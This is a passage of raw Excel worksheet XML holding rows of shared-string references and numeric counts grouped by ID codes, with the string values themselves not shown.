      <c r="A11045" t="s">
        <v>16229</v>
      </c>
      <c r="B11045" t="s">
        <v>16219</v>
      </c>
      <c r="C11045">
        <v>0</v>
      </c>
      <c r="D11045">
        <v>4778</v>
      </c>
    </row>
    <row r="11046" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11046" t="s">
        <v>16230</v>
      </c>
      <c r="B11046" t="s">
        <v>16220</v>
      </c>
      <c r="C11046">
        <v>0</v>
      </c>
      <c r="D11046">
        <v>4778</v>
      </c>
    </row>
    <row r="11047" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11047" t="s">
        <v>16229</v>
      </c>
      <c r="B11047" t="s">
        <v>16221</v>
      </c>
      <c r="C11047">
        <v>3</v>
      </c>
      <c r="D11047">
        <v>4778</v>
      </c>
    </row>
    <row r="11048" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11048" t="s">
        <v>16230</v>
      </c>
      <c r="B11048" t="s">
        <v>16222</v>
      </c>
      <c r="C11048">
        <v>3</v>
      </c>
      <c r="D11048">
        <v>4778</v>
      </c>
    </row>
    <row r="11049" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11049" t="s">
        <v>16223</v>
      </c>
      <c r="B11049" t="s">
        <v>16223</v>
      </c>
      <c r="C11049">
        <v>26</v>
      </c>
      <c r="D11049">
        <v>4778</v>
      </c>
    </row>
    <row r="11050" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11050" t="s">
        <v>16224</v>
      </c>
      <c r="B11050" t="s">
        <v>16224</v>
      </c>
      <c r="C11050">
        <v>0</v>
      </c>
      <c r="D11050">
        <v>4778</v>
      </c>
    </row>
    <row r="11051" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11051" t="s">
        <v>16228</v>
      </c>
      <c r="B11051" t="s">
        <v>16211</v>
      </c>
      <c r="C11051">
        <v>0</v>
      </c>
      <c r="D11051">
        <v>29</v>
      </c>
    </row>
    <row r="11052" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11052" t="s">
        <v>16231</v>
      </c>
      <c r="B11052" t="s">
        <v>16212</v>
      </c>
      <c r="C11052">
        <v>0</v>
      </c>
      <c r="D11052">
        <v>29</v>
      </c>
    </row>
    <row r="11053" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11053" t="s">
        <v>16228</v>
      </c>
      <c r="B11053" t="s">
        <v>16213</v>
      </c>
      <c r="C11053">
        <v>0</v>
      </c>
      <c r="D11053">
        <v>29</v>
      </c>
    </row>
    <row r="11054" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11054" t="s">
        <v>16231</v>
      </c>
      <c r="B11054" t="s">
        <v>16214</v>
      </c>
      <c r="C11054">
        <v>0</v>
      </c>
      <c r="D11054">
        <v>29</v>
      </c>
    </row>
    <row r="11055" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11055" t="s">
        <v>16228</v>
      </c>
      <c r="B11055" t="s">
        <v>16215</v>
      </c>
      <c r="C11055">
        <v>1</v>
      </c>
      <c r="D11055">
        <v>29</v>
      </c>
    </row>
    <row r="11056" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11056" t="s">
        <v>16231</v>
      </c>
      <c r="B11056" t="s">
        <v>16216</v>
      </c>
      <c r="C11056">
        <v>3</v>
      </c>
      <c r="D11056">
        <v>29</v>
      </c>
    </row>
    <row r="11057" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11057" t="s">
        <v>16228</v>
      </c>
      <c r="B11057" t="s">
        <v>16217</v>
      </c>
      <c r="C11057">
        <v>0</v>
      </c>
      <c r="D11057">
        <v>29</v>
      </c>
    </row>
    <row r="11058" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11058" t="s">
        <v>16231</v>
      </c>
      <c r="B11058" t="s">
        <v>16218</v>
      </c>
      <c r="C11058">
        <v>0</v>
      </c>
      <c r="D11058">
        <v>29</v>
      </c>
    </row>
    <row r="11059" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11059" t="s">
        <v>16229</v>
      </c>
      <c r="B11059" t="s">
        <v>16219</v>
      </c>
      <c r="C11059">
        <v>0</v>
      </c>
      <c r="D11059">
        <v>29</v>
      </c>
    </row>
    <row r="11060" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11060" t="s">
        <v>16230</v>
      </c>
      <c r="B11060" t="s">
        <v>16220</v>
      </c>
      <c r="C11060">
        <v>0</v>
      </c>
      <c r="D11060">
        <v>29</v>
      </c>
    </row>
    <row r="11061" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11061" t="s">
        <v>16229</v>
      </c>
      <c r="B11061" t="s">
        <v>16221</v>
      </c>
      <c r="C11061">
        <v>0</v>
      </c>
      <c r="D11061">
        <v>29</v>
      </c>
    </row>
    <row r="11062" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11062" t="s">
        <v>16230</v>
      </c>
      <c r="B11062" t="s">
        <v>16222</v>
      </c>
      <c r="C11062">
        <v>0</v>
      </c>
      <c r="D11062">
        <v>29</v>
      </c>
    </row>
    <row r="11063" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11063" t="s">
        <v>16223</v>
      </c>
      <c r="B11063" t="s">
        <v>16223</v>
      </c>
      <c r="C11063">
        <v>26</v>
      </c>
      <c r="D11063">
        <v>29</v>
      </c>
    </row>
    <row r="11064" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11064" t="s">
        <v>16224</v>
      </c>
      <c r="B11064" t="s">
        <v>16224</v>
      </c>
      <c r="C11064">
        <v>0</v>
      </c>
      <c r="D11064">
        <v>29</v>
      </c>
    </row>
    <row r="11065" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11065" t="s">
        <v>16228</v>
      </c>
      <c r="B11065" t="s">
        <v>16211</v>
      </c>
      <c r="C11065">
        <v>0</v>
      </c>
      <c r="D11065">
        <v>16</v>
      </c>
    </row>
    <row r="11066" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11066" t="s">
        <v>16231</v>
      </c>
      <c r="B11066" t="s">
        <v>16212</v>
      </c>
      <c r="C11066">
        <v>0</v>
      </c>
      <c r="D11066">
        <v>16</v>
      </c>
    </row>
    <row r="11067" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11067" t="s">
        <v>16228</v>
      </c>
      <c r="B11067" t="s">
        <v>16213</v>
      </c>
      <c r="C11067">
        <v>0</v>
      </c>
      <c r="D11067">
        <v>16</v>
      </c>
    </row>
    <row r="11068" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11068" t="s">
        <v>16231</v>
      </c>
      <c r="B11068" t="s">
        <v>16214</v>
      </c>
      <c r="C11068">
        <v>0</v>
      </c>
      <c r="D11068">
        <v>16</v>
      </c>
    </row>
    <row r="11069" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11069" t="s">
        <v>16228</v>
      </c>
      <c r="B11069" t="s">
        <v>16215</v>
      </c>
      <c r="C11069">
        <v>7</v>
      </c>
      <c r="D11069">
        <v>16</v>
      </c>
    </row>
    <row r="11070" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11070" t="s">
        <v>16231</v>
      </c>
      <c r="B11070" t="s">
        <v>16216</v>
      </c>
      <c r="C11070">
        <v>9</v>
      </c>
      <c r="D11070">
        <v>16</v>
      </c>
    </row>
    <row r="11071" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11071" t="s">
        <v>16228</v>
      </c>
      <c r="B11071" t="s">
        <v>16217</v>
      </c>
      <c r="C11071">
        <v>14</v>
      </c>
      <c r="D11071">
        <v>16</v>
      </c>
    </row>
    <row r="11072" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11072" t="s">
        <v>16231</v>
      </c>
      <c r="B11072" t="s">
        <v>16218</v>
      </c>
      <c r="C11072">
        <v>20</v>
      </c>
      <c r="D11072">
        <v>16</v>
      </c>
    </row>
    <row r="11073" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11073" t="s">
        <v>16229</v>
      </c>
      <c r="B11073" t="s">
        <v>16219</v>
      </c>
      <c r="C11073">
        <v>0</v>
      </c>
      <c r="D11073">
        <v>16</v>
      </c>
    </row>
    <row r="11074" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11074" t="s">
        <v>16230</v>
      </c>
      <c r="B11074" t="s">
        <v>16220</v>
      </c>
      <c r="C11074">
        <v>10</v>
      </c>
      <c r="D11074">
        <v>16</v>
      </c>
    </row>
    <row r="11075" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11075" t="s">
        <v>16229</v>
      </c>
      <c r="B11075" t="s">
        <v>16221</v>
      </c>
      <c r="C11075">
        <v>20</v>
      </c>
      <c r="D11075">
        <v>16</v>
      </c>
    </row>
    <row r="11076" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11076" t="s">
        <v>16230</v>
      </c>
      <c r="B11076" t="s">
        <v>16222</v>
      </c>
      <c r="C11076">
        <v>52</v>
      </c>
      <c r="D11076">
        <v>16</v>
      </c>
    </row>
    <row r="11077" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11077" t="s">
        <v>16223</v>
      </c>
      <c r="B11077" t="s">
        <v>16223</v>
      </c>
      <c r="C11077">
        <v>26</v>
      </c>
      <c r="D11077">
        <v>16</v>
      </c>
    </row>
    <row r="11078" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11078" t="s">
        <v>16224</v>
      </c>
      <c r="B11078" t="s">
        <v>16224</v>
      </c>
      <c r="C11078">
        <v>1</v>
      </c>
      <c r="D11078">
        <v>16</v>
      </c>
    </row>
    <row r="11079" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11079" t="s">
        <v>16228</v>
      </c>
      <c r="B11079" t="s">
        <v>16211</v>
      </c>
      <c r="C11079">
        <v>0</v>
      </c>
      <c r="D11079">
        <v>4796</v>
      </c>
    </row>
    <row r="11080" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11080" t="s">
        <v>16231</v>
      </c>
      <c r="B11080" t="s">
        <v>16212</v>
      </c>
      <c r="C11080">
        <v>0</v>
      </c>
      <c r="D11080">
        <v>4796</v>
      </c>
    </row>
    <row r="11081" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11081" t="s">
        <v>16228</v>
      </c>
      <c r="B11081" t="s">
        <v>16213</v>
      </c>
      <c r="C11081">
        <v>0</v>
      </c>
      <c r="D11081">
        <v>4796</v>
      </c>
    </row>
    <row r="11082" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11082" t="s">
        <v>16231</v>
      </c>
      <c r="B11082" t="s">
        <v>16214</v>
      </c>
      <c r="C11082">
        <v>0</v>
      </c>
      <c r="D11082">
        <v>4796</v>
      </c>
    </row>
    <row r="11083" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11083" t="s">
        <v>16228</v>
      </c>
      <c r="B11083" t="s">
        <v>16215</v>
      </c>
      <c r="C11083">
        <v>0</v>
      </c>
      <c r="D11083">
        <v>4796</v>
      </c>
    </row>
    <row r="11084" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11084" t="s">
        <v>16231</v>
      </c>
      <c r="B11084" t="s">
        <v>16216</v>
      </c>
      <c r="C11084">
        <v>0</v>
      </c>
      <c r="D11084">
        <v>4796</v>
      </c>
    </row>
    <row r="11085" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11085" t="s">
        <v>16228</v>
      </c>
      <c r="B11085" t="s">
        <v>16217</v>
      </c>
      <c r="C11085">
        <v>0</v>
      </c>
      <c r="D11085">
        <v>4796</v>
      </c>
    </row>
    <row r="11086" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11086" t="s">
        <v>16231</v>
      </c>
      <c r="B11086" t="s">
        <v>16218</v>
      </c>
      <c r="C11086">
        <v>1</v>
      </c>
      <c r="D11086">
        <v>4796</v>
      </c>
    </row>
    <row r="11087" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11087" t="s">
        <v>16229</v>
      </c>
      <c r="B11087" t="s">
        <v>16219</v>
      </c>
      <c r="C11087">
        <v>0</v>
      </c>
      <c r="D11087">
        <v>4796</v>
      </c>
    </row>
    <row r="11088" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11088" t="s">
        <v>16230</v>
      </c>
      <c r="B11088" t="s">
        <v>16220</v>
      </c>
      <c r="C11088">
        <v>0</v>
      </c>
      <c r="D11088">
        <v>4796</v>
      </c>
    </row>
    <row r="11089" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11089" t="s">
        <v>16229</v>
      </c>
      <c r="B11089" t="s">
        <v>16221</v>
      </c>
      <c r="C11089">
        <v>15</v>
      </c>
      <c r="D11089">
        <v>4796</v>
      </c>
    </row>
    <row r="11090" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11090" t="s">
        <v>16230</v>
      </c>
      <c r="B11090" t="s">
        <v>16222</v>
      </c>
      <c r="C11090">
        <v>6</v>
      </c>
      <c r="D11090">
        <v>4796</v>
      </c>
    </row>
    <row r="11091" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11091" t="s">
        <v>16223</v>
      </c>
      <c r="B11091" t="s">
        <v>16223</v>
      </c>
      <c r="C11091">
        <v>26</v>
      </c>
      <c r="D11091">
        <v>4796</v>
      </c>
    </row>
    <row r="11092" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11092" t="s">
        <v>16224</v>
      </c>
      <c r="B11092" t="s">
        <v>16224</v>
      </c>
      <c r="C11092">
        <v>1</v>
      </c>
      <c r="D11092">
        <v>4796</v>
      </c>
    </row>
    <row r="11093" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11093" t="s">
        <v>16228</v>
      </c>
      <c r="B11093" t="s">
        <v>16211</v>
      </c>
      <c r="C11093">
        <v>0</v>
      </c>
      <c r="D11093">
        <v>1274</v>
      </c>
    </row>
    <row r="11094" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11094" t="s">
        <v>16231</v>
      </c>
      <c r="B11094" t="s">
        <v>16212</v>
      </c>
      <c r="C11094">
        <v>0</v>
      </c>
      <c r="D11094">
        <v>1274</v>
      </c>
    </row>
    <row r="11095" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11095" t="s">
        <v>16228</v>
      </c>
      <c r="B11095" t="s">
        <v>16213</v>
      </c>
      <c r="C11095">
        <v>0</v>
      </c>
      <c r="D11095">
        <v>1274</v>
      </c>
    </row>
    <row r="11096" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11096" t="s">
        <v>16231</v>
      </c>
      <c r="B11096" t="s">
        <v>16214</v>
      </c>
      <c r="C11096">
        <v>0</v>
      </c>
      <c r="D11096">
        <v>1274</v>
      </c>
    </row>
    <row r="11097" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11097" t="s">
        <v>16228</v>
      </c>
      <c r="B11097" t="s">
        <v>16215</v>
      </c>
      <c r="C11097">
        <v>7</v>
      </c>
      <c r="D11097">
        <v>1274</v>
      </c>
    </row>
    <row r="11098" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11098" t="s">
        <v>16231</v>
      </c>
      <c r="B11098" t="s">
        <v>16216</v>
      </c>
      <c r="C11098">
        <v>5</v>
      </c>
      <c r="D11098">
        <v>1274</v>
      </c>
    </row>
    <row r="11099" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11099" t="s">
        <v>16228</v>
      </c>
      <c r="B11099" t="s">
        <v>16217</v>
      </c>
      <c r="C11099">
        <v>0</v>
      </c>
      <c r="D11099">
        <v>1274</v>
      </c>
    </row>
    <row r="11100" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11100" t="s">
        <v>16231</v>
      </c>
      <c r="B11100" t="s">
        <v>16218</v>
      </c>
      <c r="C11100">
        <v>0</v>
      </c>
      <c r="D11100">
        <v>1274</v>
      </c>
    </row>
    <row r="11101" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11101" t="s">
        <v>16229</v>
      </c>
      <c r="B11101" t="s">
        <v>16219</v>
      </c>
      <c r="C11101">
        <v>0</v>
      </c>
      <c r="D11101">
        <v>1274</v>
      </c>
    </row>
    <row r="11102" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11102" t="s">
        <v>16230</v>
      </c>
      <c r="B11102" t="s">
        <v>16220</v>
      </c>
      <c r="C11102">
        <v>0</v>
      </c>
      <c r="D11102">
        <v>1274</v>
      </c>
    </row>
    <row r="11103" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11103" t="s">
        <v>16229</v>
      </c>
      <c r="B11103" t="s">
        <v>16221</v>
      </c>
      <c r="C11103">
        <v>0</v>
      </c>
      <c r="D11103">
        <v>1274</v>
      </c>
    </row>
    <row r="11104" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11104" t="s">
        <v>16230</v>
      </c>
      <c r="B11104" t="s">
        <v>16222</v>
      </c>
      <c r="C11104">
        <v>0</v>
      </c>
      <c r="D11104">
        <v>1274</v>
      </c>
    </row>
    <row r="11105" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11105" t="s">
        <v>16223</v>
      </c>
      <c r="B11105" t="s">
        <v>16223</v>
      </c>
      <c r="C11105">
        <v>6</v>
      </c>
      <c r="D11105">
        <v>1274</v>
      </c>
    </row>
    <row r="11106" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11106" t="s">
        <v>16224</v>
      </c>
      <c r="B11106" t="s">
        <v>16224</v>
      </c>
      <c r="C11106">
        <v>2</v>
      </c>
      <c r="D11106">
        <v>1274</v>
      </c>
    </row>
    <row r="11107" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11107" t="s">
        <v>16228</v>
      </c>
      <c r="B11107" t="s">
        <v>16211</v>
      </c>
      <c r="C11107">
        <v>0</v>
      </c>
      <c r="D11107">
        <v>4832</v>
      </c>
    </row>
    <row r="11108" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11108" t="s">
        <v>16231</v>
      </c>
      <c r="B11108" t="s">
        <v>16212</v>
      </c>
      <c r="C11108">
        <v>0</v>
      </c>
      <c r="D11108">
        <v>4832</v>
      </c>
    </row>
    <row r="11109" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11109" t="s">
        <v>16228</v>
      </c>
      <c r="B11109" t="s">
        <v>16213</v>
      </c>
      <c r="C11109">
        <v>0</v>
      </c>
      <c r="D11109">
        <v>4832</v>
      </c>
    </row>
    <row r="11110" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11110" t="s">
        <v>16231</v>
      </c>
      <c r="B11110" t="s">
        <v>16214</v>
      </c>
      <c r="C11110">
        <v>0</v>
      </c>
      <c r="D11110">
        <v>4832</v>
      </c>
    </row>
    <row r="11111" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11111" t="s">
        <v>16228</v>
      </c>
      <c r="B11111" t="s">
        <v>16215</v>
      </c>
      <c r="C11111">
        <v>24</v>
      </c>
      <c r="D11111">
        <v>4832</v>
      </c>
    </row>
    <row r="11112" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11112" t="s">
        <v>16231</v>
      </c>
      <c r="B11112" t="s">
        <v>16216</v>
      </c>
      <c r="C11112">
        <v>27</v>
      </c>
      <c r="D11112">
        <v>4832</v>
      </c>
    </row>
    <row r="11113" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11113" t="s">
        <v>16228</v>
      </c>
      <c r="B11113" t="s">
        <v>16217</v>
      </c>
      <c r="C11113">
        <v>31</v>
      </c>
      <c r="D11113">
        <v>4832</v>
      </c>
    </row>
    <row r="11114" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11114" t="s">
        <v>16231</v>
      </c>
      <c r="B11114" t="s">
        <v>16218</v>
      </c>
      <c r="C11114">
        <v>42</v>
      </c>
      <c r="D11114">
        <v>4832</v>
      </c>
    </row>
    <row r="11115" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11115" t="s">
        <v>16229</v>
      </c>
      <c r="B11115" t="s">
        <v>16219</v>
      </c>
      <c r="C11115">
        <v>44</v>
      </c>
      <c r="D11115">
        <v>4832</v>
      </c>
    </row>
    <row r="11116" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11116" t="s">
        <v>16230</v>
      </c>
      <c r="B11116" t="s">
        <v>16220</v>
      </c>
      <c r="C11116">
        <v>67</v>
      </c>
      <c r="D11116">
        <v>4832</v>
      </c>
    </row>
    <row r="11117" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11117" t="s">
        <v>16229</v>
      </c>
      <c r="B11117" t="s">
        <v>16221</v>
      </c>
      <c r="C11117">
        <v>56</v>
      </c>
      <c r="D11117">
        <v>4832</v>
      </c>
    </row>
    <row r="11118" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11118" t="s">
        <v>16230</v>
      </c>
      <c r="B11118" t="s">
        <v>16222</v>
      </c>
      <c r="C11118">
        <v>221</v>
      </c>
      <c r="D11118">
        <v>4832</v>
      </c>
    </row>
    <row r="11119" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11119" t="s">
        <v>16223</v>
      </c>
      <c r="B11119" t="s">
        <v>16223</v>
      </c>
      <c r="C11119">
        <v>24</v>
      </c>
      <c r="D11119">
        <v>4832</v>
      </c>
    </row>
    <row r="11120" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11120" t="s">
        <v>16224</v>
      </c>
      <c r="B11120" t="s">
        <v>16224</v>
      </c>
      <c r="C11120">
        <v>1</v>
      </c>
      <c r="D11120">
        <v>4832</v>
      </c>
    </row>
    <row r="11121" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11121" t="s">
        <v>16228</v>
      </c>
      <c r="B11121" t="s">
        <v>16211</v>
      </c>
      <c r="C11121">
        <v>0</v>
      </c>
      <c r="D11121">
        <v>321</v>
      </c>
    </row>
    <row r="11122" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11122" t="s">
        <v>16231</v>
      </c>
      <c r="B11122" t="s">
        <v>16212</v>
      </c>
      <c r="C11122">
        <v>0</v>
      </c>
      <c r="D11122">
        <v>321</v>
      </c>
    </row>
    <row r="11123" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11123" t="s">
        <v>16228</v>
      </c>
      <c r="B11123" t="s">
        <v>16213</v>
      </c>
      <c r="C11123">
        <v>0</v>
      </c>
      <c r="D11123">
        <v>321</v>
      </c>
    </row>
    <row r="11124" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11124" t="s">
        <v>16231</v>
      </c>
      <c r="B11124" t="s">
        <v>16214</v>
      </c>
      <c r="C11124">
        <v>0</v>
      </c>
      <c r="D11124">
        <v>321</v>
      </c>
    </row>
    <row r="11125" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11125" t="s">
        <v>16228</v>
      </c>
      <c r="B11125" t="s">
        <v>16215</v>
      </c>
      <c r="C11125">
        <v>7</v>
      </c>
      <c r="D11125">
        <v>321</v>
      </c>
    </row>
    <row r="11126" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11126" t="s">
        <v>16231</v>
      </c>
      <c r="B11126" t="s">
        <v>16216</v>
      </c>
      <c r="C11126">
        <v>1</v>
      </c>
      <c r="D11126">
        <v>321</v>
      </c>
    </row>
    <row r="11127" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11127" t="s">
        <v>16228</v>
      </c>
      <c r="B11127" t="s">
        <v>16217</v>
      </c>
      <c r="C11127">
        <v>6</v>
      </c>
      <c r="D11127">
        <v>321</v>
      </c>
    </row>
    <row r="11128" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11128" t="s">
        <v>16231</v>
      </c>
      <c r="B11128" t="s">
        <v>16218</v>
      </c>
      <c r="C11128">
        <v>0</v>
      </c>
      <c r="D11128">
        <v>321</v>
      </c>
    </row>
    <row r="11129" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11129" t="s">
        <v>16229</v>
      </c>
      <c r="B11129" t="s">
        <v>16219</v>
      </c>
      <c r="C11129">
        <v>2</v>
      </c>
      <c r="D11129">
        <v>321</v>
      </c>
    </row>
    <row r="11130" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11130" t="s">
        <v>16230</v>
      </c>
      <c r="B11130" t="s">
        <v>16220</v>
      </c>
      <c r="C11130">
        <v>4</v>
      </c>
      <c r="D11130">
        <v>321</v>
      </c>
    </row>
    <row r="11131" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11131" t="s">
        <v>16229</v>
      </c>
      <c r="B11131" t="s">
        <v>16221</v>
      </c>
      <c r="C11131">
        <v>32</v>
      </c>
      <c r="D11131">
        <v>321</v>
      </c>
    </row>
    <row r="11132" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11132" t="s">
        <v>16230</v>
      </c>
      <c r="B11132" t="s">
        <v>16222</v>
      </c>
      <c r="C11132">
        <v>16</v>
      </c>
      <c r="D11132">
        <v>321</v>
      </c>
    </row>
    <row r="11133" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11133" t="s">
        <v>16223</v>
      </c>
      <c r="B11133" t="s">
        <v>16223</v>
      </c>
      <c r="C11133">
        <v>25</v>
      </c>
      <c r="D11133">
        <v>321</v>
      </c>
    </row>
    <row r="11134" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11134" t="s">
        <v>16224</v>
      </c>
      <c r="B11134" t="s">
        <v>16224</v>
      </c>
      <c r="C11134">
        <v>1</v>
      </c>
      <c r="D11134">
        <v>321</v>
      </c>
    </row>
    <row r="11135" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11135" t="s">
        <v>16228</v>
      </c>
      <c r="B11135" t="s">
        <v>16211</v>
      </c>
      <c r="C11135">
        <v>0</v>
      </c>
      <c r="D11135">
        <v>4962</v>
      </c>
    </row>
    <row r="11136" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11136" t="s">
        <v>16231</v>
      </c>
      <c r="B11136" t="s">
        <v>16212</v>
      </c>
      <c r="C11136">
        <v>0</v>
      </c>
      <c r="D11136">
        <v>4962</v>
      </c>
    </row>
    <row r="11137" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11137" t="s">
        <v>16228</v>
      </c>
      <c r="B11137" t="s">
        <v>16213</v>
      </c>
      <c r="C11137">
        <v>0</v>
      </c>
      <c r="D11137">
        <v>4962</v>
      </c>
    </row>
    <row r="11138" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11138" t="s">
        <v>16231</v>
      </c>
      <c r="B11138" t="s">
        <v>16214</v>
      </c>
      <c r="C11138">
        <v>0</v>
      </c>
      <c r="D11138">
        <v>4962</v>
      </c>
    </row>
    <row r="11139" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11139" t="s">
        <v>16228</v>
      </c>
      <c r="B11139" t="s">
        <v>16215</v>
      </c>
      <c r="C11139">
        <v>10</v>
      </c>
      <c r="D11139">
        <v>4962</v>
      </c>
    </row>
    <row r="11140" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11140" t="s">
        <v>16231</v>
      </c>
      <c r="B11140" t="s">
        <v>16216</v>
      </c>
      <c r="C11140">
        <v>0</v>
      </c>
      <c r="D11140">
        <v>4962</v>
      </c>
    </row>
    <row r="11141" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11141" t="s">
        <v>16228</v>
      </c>
      <c r="B11141" t="s">
        <v>16217</v>
      </c>
      <c r="C11141">
        <v>3</v>
      </c>
      <c r="D11141">
        <v>4962</v>
      </c>
    </row>
    <row r="11142" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11142" t="s">
        <v>16231</v>
      </c>
      <c r="B11142" t="s">
        <v>16218</v>
      </c>
      <c r="C11142">
        <v>2</v>
      </c>
      <c r="D11142">
        <v>4962</v>
      </c>
    </row>
    <row r="11143" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11143" t="s">
        <v>16229</v>
      </c>
      <c r="B11143" t="s">
        <v>16219</v>
      </c>
      <c r="C11143">
        <v>17</v>
      </c>
      <c r="D11143">
        <v>4962</v>
      </c>
    </row>
    <row r="11144" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11144" t="s">
        <v>16230</v>
      </c>
      <c r="B11144" t="s">
        <v>16220</v>
      </c>
      <c r="C11144">
        <v>1</v>
      </c>
      <c r="D11144">
        <v>4962</v>
      </c>
    </row>
    <row r="11145" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11145" t="s">
        <v>16229</v>
      </c>
      <c r="B11145" t="s">
        <v>16221</v>
      </c>
      <c r="C11145">
        <v>86</v>
      </c>
      <c r="D11145">
        <v>4962</v>
      </c>
    </row>
    <row r="11146" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11146" t="s">
        <v>16230</v>
      </c>
      <c r="B11146" t="s">
        <v>16222</v>
      </c>
      <c r="C11146">
        <v>2</v>
      </c>
      <c r="D11146">
        <v>4962</v>
      </c>
    </row>
    <row r="11147" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11147" t="s">
        <v>16223</v>
      </c>
      <c r="B11147" t="s">
        <v>16223</v>
      </c>
      <c r="C11147">
        <v>20</v>
      </c>
      <c r="D11147">
        <v>4962</v>
      </c>
    </row>
    <row r="11148" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11148" t="s">
        <v>16224</v>
      </c>
      <c r="B11148" t="s">
        <v>16224</v>
      </c>
      <c r="C11148">
        <v>3</v>
      </c>
      <c r="D11148">
        <v>4962</v>
      </c>
    </row>
    <row r="11149" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11149" t="s">
        <v>16228</v>
      </c>
      <c r="B11149" t="s">
        <v>16211</v>
      </c>
      <c r="C11149">
        <v>0</v>
      </c>
      <c r="D11149">
        <v>4969</v>
      </c>
    </row>
    <row r="11150" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11150" t="s">
        <v>16231</v>
